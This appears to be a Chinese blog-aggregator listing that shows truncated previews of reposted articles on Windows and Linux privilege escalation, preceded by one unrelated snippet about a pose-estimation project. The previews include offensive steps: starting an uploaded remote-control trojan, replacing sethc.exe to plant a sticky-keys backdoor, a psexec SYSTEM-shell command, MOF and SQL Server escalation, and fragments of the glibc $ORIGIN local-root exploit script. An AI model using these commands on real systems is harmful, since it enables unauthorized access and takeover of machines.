本项目是在论文Real-time 2D Multi-Person Pose Estimation on CPU提供的代码基础上进行的功能实现。上述论文是基于OpenPose算法进行了改进,引入了MobileNet作为轻量化网络加快推理速度。由于实验环境受限,本项目没有再进一步训练,而是直接使用上述提供的预权重进行运动检测功能实现【预权重链接见文末】。项目已实现功能:人体关键点检测深蹲运动状态检测环
可以执行CMD时候 1.A:将远控的后缀改为.tmp,然后上传上去~! B:将该远控传上去。C:用命令start e:/admin/admin.tmp,然后等着木马上线~! 2.替换服务 shift键 A:在CMD下执行一下命令: copy c:/windows/explorer.exe c:/windows/system32/sethc.exe copy c:/windows/system3
转载 2024-03-01 10:31:15
9阅读
(( 本地溢出 ))计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.想要执行cmd命令,就要wscript.shell组建支持,或是支持
转载 精选 2015-10-31 11:09:07
5750阅读
文章目录Windows 的常用方法的常用命令windows 辅助脚本windows漏洞流程补丁查询漏洞hacking8在线查询补丁wesng 查询补丁WindowsVulnScan 查询补丁工具的原理参数说明使用说明windows常用漏洞CVE-2016-3225(MS16-075)漏洞描述:影响版本漏洞复现漏洞修复CVE-2014-4113 (MS14-058)
转载 2024-05-03 10:56:45
102阅读
【Windows】工具、命令
原创 2022-05-30 09:35:41
5516阅读
充当红队(红蓝对抗)或者渗透测试活动的时候,能努力获取系统的System权限总是咱们的终极目标。System用户是个特殊的系统操作用户,具备高权限,非常方便后渗透的技术施展。 当然,为获取System权限,你要么是administrators管理员组一员,要么使用一些特别的token窃取或伪造技术(例如:The lonely potato),要么通过一些未修补的漏洞利用等等姿势。如果你有
转载 2024-06-05 07:05:42
139阅读
psexec -i -s -d cmd.exe
转载 2007-11-13 23:42:09
579阅读
前言今天给大家带来的是linux下的技巧。SUID
转载 2023-08-01 16:14:33
873阅读
Sa方式很多,而最快捷的方式就是shift粘滞键镜像劫持。这种Sa方法必须满足几个条件,数据库可以远程访问,服务器开启了终端远程访问也就是3389和粘滞键功能。这样就可以利用Microsoft SQL Server Management Studio或其他漏洞检测工具来连接远程数据库了。个人推荐使用Microsoft SQL Server Management Studio,可以到微软官方
转载 2024-04-11 21:56:58
65阅读
mof原理mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用
转载 2024-01-15 16:57:37
103阅读
 HACK技术学的再好,                    却无法入侵你的心,           &
转载 精选 2011-06-01 15:43:39
365阅读
3点赞
Windows总结一、简介分为纵向和横向。纵向:低权限用户获取高权限用户权限。横向:获取同级别其他用户限。Windows操作系统主要包括:系统内核溢出漏洞、数据库、系统配置错误、组策略首选项、中间件漏洞、DLL劫持、滥用高风险、第三封软件/服务等。二、方法介绍1. 系统内核溢出漏洞通过利用系统内核本身漏洞进行。漏洞查询页面:ht
转载 2024-05-21 16:07:02
61阅读
#!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /tmp/exploit ln /bin/ping /tmp/exploit/target exec 3< /tmp/exploit/target ls -l /proc/$$/fd/3 rm -rf /tmp/exploit ls -l /proc/$$/fd/3 c
原创 2013-07-07 00:23:11
3703阅读
http://seclists.org/fulldisclosure/2010/Oct/257     # Create a directory in /tmp we can control.$ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN.$ l
转载 2011-02-11 11:38:36
1036阅读
# Create a directory in /tmp we can control. $ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN. $ ln /bin/ping /tmp/exploit/target # Open a file descriptor to
转载 2011-02-22 13:01:27
643阅读
优先顺序:本地-应用-数据库在windows中guest和User用户不能登陆3389poweruser可以登陆3389LINUX 只有内核tasklist1.windows(RECYCLER目录可读)将cmd.exe传到RECYCLER里面ipconfigwhoaminetstatsysteminfonet user要开3389端口查看这两个漏洞添加可远程登陆用户ms13
1
原创 2014-03-21 11:20:11
1101阅读
1.XP,20031. 利用at命令,下面是at命令的百度解释AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。因为at命令默认是以system权限下运行的所以我们可以利用以下命令,进行。at 时间 /intera
Android user版本root:软件版本:android4.3硬件平台:marvell方案一:第一步,修改adb.c,添加可执行程序,完成root,修改如下:adb.c:注释掉下列部分,/* then switch user and group to "shell" */ if (setgid(AID_SHELL) != 0) { exit(1); if (setuid(AID_SHEL
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法Metasploit 是一个框架,kali 内安装了,安装位置如下/usr/share/metasploit-framework选定需要使用的模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个的测试和利用
原创 2022-12-20 15:02:56
6648阅读
下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关键点(Linux)的是怎么一回事:收集 – 枚举,枚举和一些更多的枚举。过程 – 通过数据排序,分析和确定优先
转载 2023-12-14 15:17:04
20阅读
  • 1
  • 2
  • 3
  • 4
  • 5